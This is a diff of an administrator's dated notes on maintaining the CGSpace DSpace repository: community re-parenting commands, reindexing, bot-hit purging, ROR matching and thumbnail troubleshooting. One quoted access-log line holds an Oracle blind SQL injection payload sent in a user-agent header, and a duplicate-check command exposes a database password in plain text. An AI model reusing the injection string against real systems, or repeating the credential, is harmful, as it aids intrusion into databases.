                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    $ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    • Remove CPWF and CTA subjects from the Discovery facets
                                                                                                                                                                                                                                                                                                                                                                                                    • Start a full Discovery index on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    -real    275m15.777s
                                                                                                                                                                                                                                                                                                                                                                                                    -user    182m52.171s
                                                                                                                                                                                                                                                                                                                                                                                                    -sys     2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      +real    275m15.777s
                                                                                                                                                                                                                                                                                                                                                                                                      +user    182m52.171s
                                                                                                                                                                                                                                                                                                                                                                                                      +sys     2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      • I got a request to confirm validation of CGSpace on openarchives.org, with the requestor’s IP being 128.84.116.66
                                                                                                                                                                                                                                                                                                                                                                                                        • That is at Cornell… hmmmm who could that be?!
                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -192,8 +192,8 @@ sys 2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        • 3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
                                                                                                                                                                                                                                                                                                                                                                                                          • The user agent is sometimes a normal user one, and sometimes Apache-HttpClient/4.3.4 (java 1.5)
                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -202,27 +202,27 @@ sys 2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                          • 217.182.21.193 made 2,400 requests and is on OVH
                                                                                                                                                                                                                                                                                                                                                                                                          • I purged these hits
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 26817 hits from 64.39.98.40 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 9446 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 6490 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 11949 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          -Total number of bot hits purged: 54702
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 26817 hits from 64.39.98.40 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 9446 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 6490 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 11949 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            +Total number of bot hits purged: 54702
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            • Export donors and affiliations from CGSpace database:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                            -COPY 1036
                                                                                                                                                                                                                                                                                                                                                                                                            -localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                            -COPY 7901
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              +COPY 1036
                                                                                                                                                                                                                                                                                                                                                                                                              +localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              +COPY 7901
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              • Then check matches against the latest ROR dump:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                • I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)
                                                                                                                                                                                                                                                                                                                                                                                                                • I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)
                                                                                                                                                                                                                                                                                                                                                                                                                • Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -245,37 +245,37 @@ $ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json
                                                                                                                                                                                                                                                                                                                                                                                                                • I synchronized DSpace Test with a fresh snapshot of CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                • I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the dspace filter-media script manually and eventually it crashed:
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                -SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                -Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
                                                                                                                                                                                                                                                                                                                                                                                                                -SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                -File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                -Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                -java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
                                                                                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                                                                                  +SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                  +Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
                                                                                                                                                                                                                                                                                                                                                                                                                  +SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                  +File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  +Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                  +java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  • I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
                                                                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                                                                  2022-02-04

                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
                                                                                                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                                                                                                  2022-02-04

                                                                                                                                                                                                                                                                                                                                                                                                                  • I found a thread on the dspace-tech mailing list about the media-filter crash above
                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -284,14 +284,14 @@ java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([B
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
                                                                                                                                                                                                                                                                                                                                                                                                                  -The following MediaFilters are enabled: 
                                                                                                                                                                                                                                                                                                                                                                                                                  -Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                  -org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                  -File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  -FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
                                                                                                                                                                                                                                                                                                                                                                                                                    +The following MediaFilters are enabled: 
                                                                                                                                                                                                                                                                                                                                                                                                                    +Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                    +org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                    +File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    +FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    • Meeting with the repositories working group to discuss issues moving forward in the One CGIAR

                                                                                                                                                                                                                                                                                                                                                                                                                    2022-02-07

                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -302,20 +302,20 @@ File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                or(
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('1')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('4')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('5')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('6')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('8')),
                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                -sNotNull(value.match('178')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('186')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('188')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('189')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  or(
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('1')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('4')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('5')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('6')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('8')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                                                                                  +sNotNull(value.match('178')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('186')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('188')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('189')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I flagged all of these (seventy-five items)…
                                                                                                                                                                                                                                                                                                                                                                                                                    • I decided to flag the deletes instead of star the keeps because there are some items in the original file that we not marked as duplicates so we have to keep those too
                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -323,19 +323,19 @@ isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                    • I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
